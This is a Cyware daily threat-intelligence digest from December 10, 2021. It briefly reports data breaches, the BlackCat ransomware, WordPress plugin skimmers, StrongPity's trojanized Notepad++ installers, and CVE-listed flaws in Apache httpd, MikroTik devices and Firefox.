Go to listing page

Cyware Daily Threat Intelligence, December 10, 2021

Cyware Daily Threat Intelligence, December 10, 2021

Share Blog Post

The cyber-arms race between cybercriminals and security teams continues with the discovery of new sneaky mechanisms used by attackers to bypass existing defenses. Among the new threats reported in the last 24 hours was the first Rust-based ransomware used in real-world attacks and a malware campaign by an infamous APT group distributing a keylogger through malicious installers.

In other news, the CISA warned of several Apache HTTP Server vulnerabilities that affect multiple Cisco enterprise products, whereas Mozilla patched high-severity vulnerabilities in its Firefox browser and Thunderbird mail client. Lastly, data breaches at a payroll solution provider and a food importer affected the personal information of thousands of employees.


Top Breaches Reported in the Last 24 Hours

Data breach at Cox Communications
The US-based telecommunications and digital cable provider Cox Communications suffered a data breach after a hacker impersonated its support agent to gain access to customers' personal information. The hacker may have accessed the details of some customers, including their names, addresses, telephone numbers, Cox account numbers, Cox.net email addresses, usernames, PIN codes, account security questions and answers, and the types of services they are subscribed to.

Government workers breached
Payroll solution provider Frontier Software was hit by a ransomware attack recently. During this incident, the attackers may have accessed the personal information of at least 38,000 and up to 80,000 government employees of the state of South Australia. The data included names, birthdates, tax file numbers, home addresses, bank account details, and other employment and payroll-related information.

Food importer hit by ransomware
North American food importer Atalanta Corporation disclosed a data breach following a ransomware attack that impacted its employees’ personal information. An investigation into the incident revealed that certain information related to Atalanta’s current and former employees and certain visitors was accessed during this incident.


Top Malware Reported in the Last 24 Hours

First Rust-based ransomware
A first-of-its-kind ransomware strain was discovered this week which was written in the Rust programming language. It is the first such ransomware to be used in attacks in the wild as opposed to just experimental concepts created in the past. The operators behind the ransomware, dubbed ALPHV (or BlackCat), are advertising it as a ransomware-as-a-service on two underground cybercrime forums, namely XSS and Exploit.

Malware-laced WordPress plugins
Sucuri researchers warned of credit card skimmers being injected into random plugins of e-commerce WordPress sites. Instead of injecting skimmers into ‘wp-admin’ and ‘wp-includes’ core directories, threat actors are using the plugin files to hide their malicious scripts or inject a backdoor to gain persistence even after installation of the latest security updates.

Malware campaign by StrongPity APT
The sophisticated StrongPity hacker group was found using malware-laced Notepad++ installers to infect their targets with a keylogger coupled with persistence capabilities. The group, also known as APT-C-41 and Promethium, was previously known for distributing trojanized WinRAR installers in highly-targeted campaigns between 2016 and 2018.


Top Vulnerabilities Reported in the Last 24 Hours

Apache HTTP Server vulnerabilities
The CISA released a second advisory about several Apache HTTP server vulnerabilities. The five vulnerabilities, tracked as CVE-2021-33193, CVE-2021-34798, CVE-2021-36160, CVE-2021-39275, and CVE-2021-40438, in the Apache HTTP Server (httpd) 2.4.48 and earlier releases impact multiple Cisco products used by enterprises worldwide.

MicroTik devices exposed to attacks
Researchers found MicroTik devices exposed to remote takeover attacks due to a set of unaddressed vulnerabilities. This includes two high-severity flaws, tracked as CVE-2019-3977 and CVE-2019-3978, with CVSS scores of 7.5 each. The remaining two critical flaws enabling full takeover of devices are CVE-2018-14847 (CVSS score: 9.1) and
CVE-2018-7445 (CVSS score: 9.8).

Mozilla releases security updates
Mozilla released security updates for the Firefox browser and the Thunderbird mail client to address multiple vulnerabilities, including several bugs rated high severity. The Firefox 95 version addresses 13 vulnerabilities, including six issues with high severity ratings. Some of the patches were also included in Firefox ESR 91.4 and Thunderbird 91.4.0.

 Tags

mozilla thunderbird
wordpress sites
atlanta
strongpity apt
credit card skimmers
microtik
firefox browsers
blackcat
cox communications
apache http server
remote takeover attacks

Posted on: December 10, 2021


More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.